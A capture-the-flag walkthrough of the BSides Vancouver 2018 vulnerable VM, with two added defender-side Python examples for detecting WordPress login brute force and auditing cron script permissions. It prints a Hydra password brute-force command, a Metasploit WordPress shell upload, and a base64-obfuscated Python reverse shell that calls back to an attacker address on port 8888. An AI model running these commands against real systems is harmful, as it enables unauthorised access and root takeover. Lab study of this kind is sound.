Name: BSides Vancouver: 2018 (Workshop)
Date release: 21 Mar 2018
Author: abatchy
Series: BSides Vancouver
Web page: https://www.abatchy.com/projects
Vulnhub: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
Description:
Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target.
This workshop will provide you with a custom-made VM where the goal is to obtain root level access on it.
This is a great chance for people who want to get into pentesting but don’t know where to start.
If this sounds intimidating, don’t worry! During the workshop, we’ll be discussing various methodologies, common pitfalls and useful tools at every step of our pentest.
Requirements:
- Laptop capable of running two VMs, with a USB port.
- At least 20GB of free space.
- VirtualBox pre-installed.
- Kali VM
- Some familiarity with CLI.
1. Service Enumeration
Using the following nmap command:
nmap -O -A -sT -sV -p- -T5 192.168.1.39 -vvv
The scan shows 3 services running: FTP, SSH, and a web service.
2. FTP Enumeration
The FTP service is set up to allow anonymous authentication, with access to a folder called "public". Using my web browser, I can view the public directory:
Inside the public directory we find a backup of a text file called users.txt.bk.
3. Web Enumeration
I ran a number of different scans against the web service, using tools including nikto, dirb, and dirbuster.
For this exercise, showing just the nikto output feels sufficient, since the rest is overkill.
Here is the Nikto command and the scan results:
Nikto found a robots.txt file with a disallow entry for /backup_wordpress.
At this point we know there is a WordPress install on the site. Loading up the wpscan tool with the following command:
wpscan -u http://192.168.1.39/backup_wordpress --enumerate u --enumerate p --enumerate t
We got the following interesting output:
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
So between the WordPress users and the users backup file we found on the FTP service, it appears we should look for the credentials of the user john.
Using THC Hydra, a password brute-forcing tool, we were able to obtain john's password. The following hydra command was used:
hydra -l john -P /root/Desktop/rockyou.txt 192.168.1.39 -V http-post-form '/backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 25
Breaking down the above command:
-l john
- Specify the target user, john
-P /root/Desktop/rockyou.txt
- Load the rockyou password list
-V
- Verbose mode: show each login/password combination as it is tried
http-post-form
- The Hydra service module: an HTTP POST form attack
/backup_wordpress/wp-login.php:
- Target URI of the login page
log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1
- The form fields the WordPress login page submits; ^USER^ and ^PASS^ are placeholders that Hydra replaces with the values from -l and -P
S=Location
- Success condition. Hydra checks the HTTP response for the string "Location" (the redirect header WordPress sends after a valid login); if it is found, the attempt counts as a successful login
-t 25
- Run 25 connection attempts in parallel. Anything higher on this VM breaks it (found by trial and error)
The scan took about 11 minutes to find the password, enigma, which was on line #2531 of the rockyou.txt file:
The rockyou file is a dictionary of passwords that was dumped from a major website related to video games back in the day.
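From the defender's side, the Hydra run described above leaves a distinctive trace in the target's web server logs: a burst of POST requests to wp-login.php from a single source address, where every failed guess is answered with a 200 (the login page again) and the one success with a 302 redirect, the same Location header that the S=Location condition keys on. The following is an added example, not code from the original walkthrough, that parses Apache combined-format access log lines and flags that pattern. The log lines, the 20-attempts-in-5-minutes threshold and the user agent are constructed for the example; the IP addresses are the ones used in this walkthrough.

```python
"""Spotting a WordPress login brute force in Apache access logs.

Added, defender-side example; not part of the original walkthrough.
It looks for many POSTs to wp-login.php from one IP in a short window,
and reports whether any of them drew a 302 (the redirect WordPress sends
after a valid login). All log lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format; only the fields the detection needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_login_bruteforce(lines, threshold=20, window=timedelta(minutes=5)):
    """Flag source IPs that POST to wp-login.php at least `threshold` times
    inside any `window`-long span. Maps ip -> {attempts, failures, success};
    `success` is True if one of that IP's login POSTs was answered with 302."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/wp-login.php"):
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        start = 0
        for end in range(len(recs)):
            # slide the window start forward until recs[start:end+1] fits in `window`
            while recs[end]["time"] - recs[start]["time"] > window:
                start += 1
            if end - start + 1 >= threshold:
                findings[ip] = {
                    "attempts": len(recs),
                    "failures": sum(1 for r in recs if r["status"] == 200),
                    "success": any(r["status"] == 302 for r in recs),
                }
                break
    return findings


def build_sample_log():
    """Constructed access-log excerpt: 24 failed guesses and one success from
    the attacking host, plus ordinary traffic that must not be flagged."""
    t0 = datetime(2018, 3, 21, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{t}] "{m} {p} HTTP/1.1" {s} 3412 "-" "Mozilla/5.0"'

    def entry(ip, secs, method, path, status):
        t = (t0 + timedelta(seconds=secs)).strftime(TIME_FMT)
        return fmt.format(ip=ip, t=t, m=method, p=path, s=status)

    login = "/backup_wordpress/wp-login.php"
    lines = [entry("10.0.0.5", 0, "GET", "/backup_wordpress/", 200),
             entry("10.0.0.5", 30, "POST", login, 302)]   # one legitimate login
    lines += [entry("192.168.1.29", 60 + 2 * i, "POST", login, 200) for i in range(24)]
    lines.append(entry("192.168.1.29", 60 + 2 * 24, "POST", login, 302))
    return lines


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(build_sample_log()).items():
        print(f"{ip}: {info['attempts']} login POSTs, {info['failures']} failed, "
              f"success={'yes' if info['success'] else 'no'}")
```

Run against a real access log, one line per list element, the same function reports every source that crossed the threshold; a `success` of True is the case worth paging on, since it means the guessing stopped because a password worked. The sliding window matters because a patient attacker spreads attempts out; lowering `threshold` or widening `window` trades false positives for sensitivity.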
4. Establish Foothold
Loading up the Metasploit framework console, I used the following exploit:
use exploit/unix/webapp/wp_admin_shell_upload
Then I set my options:
After setting all the necessary options, type run to kick off the exploit. You should then be presented with a meterpreter shell:
We now have a shell running as the web service user:
5. Privilege Escalation
After digging around on the machine for some time, I found that root's crontab was world readable.
Root has a cleanup script that runs continuously: the row of leading asterisks in the schedule fields matches every minute, hour, day, month and weekday. The cleanup script has world read, write and execute permissions (777):
I proceeded to download this script from the meterpreter shell:
The contents of the script:
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
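The misconfiguration behind this escalation is a root cron job that executes a script anyone can modify. As an added example, not code from the original walkthrough, the audit below parses /etc/crontab-style lines (five schedule fields, a user, then the command), works out which script each job runs, and reports jobs whose script is writable by group or others, owned by an untrusted account, placed in a world-writable directory, or missing entirely. The crontab text and the two scripts it references are constructed in a temporary directory so the check runs offline; the interpreter list and the one-script-per-command heuristic are simplifying assumptions.

```python
"""Auditing cron jobs for scripts that unprivileged users can modify.

Added example; not part of the original walkthrough. Finds jobs like the
777 cleanup script above, whose contents any local user can change and
which root then executes on the next run. Crontab text and scripts are
constructed so the audit runs offline.
"""
import os
import stat
import tempfile

# assumed interpreter paths to skip when locating the script a job runs
INTERPRETERS = {"/bin/sh", "/bin/bash", "/usr/bin/env", "/usr/bin/python", "/usr/bin/python3"}


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line. Comments, blank
    lines and VAR=value settings are skipped; @reboot-style shortcuts are
    left out of this example."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        yield " ".join(fields[:5]), fields[5], fields[6]


def script_path(command):
    """Return the first absolute path in the command that is not an
    interpreter, so 'sh /path/x.sh' resolves to x.sh; None if there is none."""
    for tok in command.split():
        if tok.startswith("/") and len(tok) > 1 and tok not in INTERPRETERS:
            return tok
    return None


def weak_permissions(path, trusted_uids=frozenset({0})):
    """List the reasons `path` is unsafe for a root cron job to execute."""
    if not os.path.exists(path):
        return ["script does not exist (anyone able to create it controls the job)"]
    st = os.stat(path)
    reasons = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("script is group/world writable (mode %o)" % stat.S_IMODE(st.st_mode))
    if st.st_uid not in trusted_uids:
        reasons.append("script owned by uid %d, not a trusted account" % st.st_uid)
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world writable without the sticky bit")
    return reasons


def audit_crontab(text, trusted_uids=frozenset({0})):
    """Return one finding per job whose script fails weak_permissions()."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        path = script_path(command)
        if path is None:
            continue
        reasons = weak_permissions(path, trusted_uids)
        if reasons:
            findings.append({"schedule": schedule, "user": user, "script": path, "reasons": reasons})
    return findings


def run_demo():
    """Build a constructed crontab with one 777 script (the walkthrough's bug)
    and one 755 script, then audit it. The files belong to the current user,
    so that uid is treated as trusted alongside root for this offline demo."""
    workdir = tempfile.mkdtemp()
    bad = os.path.join(workdir, "cleanup.sh")
    good = os.path.join(workdir, "rotate.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho housekeeping\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    crontab = (
        "# constructed /etc/crontab\n"
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        f"* * * * * root /bin/sh {bad}\n"   # every minute, like the walkthrough's job
        f"0 3 * * * root {good}\n"
        "30 4 * * * root sync\n"             # no script path, skipped by the audit
    )
    return audit_crontab(crontab, trusted_uids=frozenset({0, os.getuid()}))


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f['schedule']}] {f['user']} -> {f['script']}: " + "; ".join(f["reasons"]))
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d with the default trusted_uids; the fix for anything it reports is the usual one, root-owned and mode 755 (or stricter) for both the script and its directory.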
Using msfvenom, we will replace the contents of the cleanup script with a Python reverse shell, generated with the following command:
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.29 lport=8888
msfvenom then outputs a chunk of code that will be our Python reverse shell:
I replaced the rm command in the cleanup script with the Python code msfvenom generated. Here it is for your reference:
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsIHN1YnByb2Nlc3MgICAgLCBvcyAgOyAgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4yOSIgIDsgICAgICAgICBwb3J0PTg4ODggIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICwgcG9ydCkpICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgMCkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsIDIpICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
After editing in my payload, I upload the script back to the server from my meterpreter shell:
Then, on my Kali system, I start a netcat listener on port 8888 using:
nc -lvp 8888
After a brief moment, I receive the reverse root shell as expected:
In the /root directory there is a flag.txt file which basically says congrats, you obtained root. It also says there were numerous other ways to obtain root; did you find them?
There you have it!
Feel free to ask questions should you have any. I will do my best to explain, given that I would still consider myself a novice at penetration testing.
Please follow me if you are interested in future walkthroughs, as I intend to post more!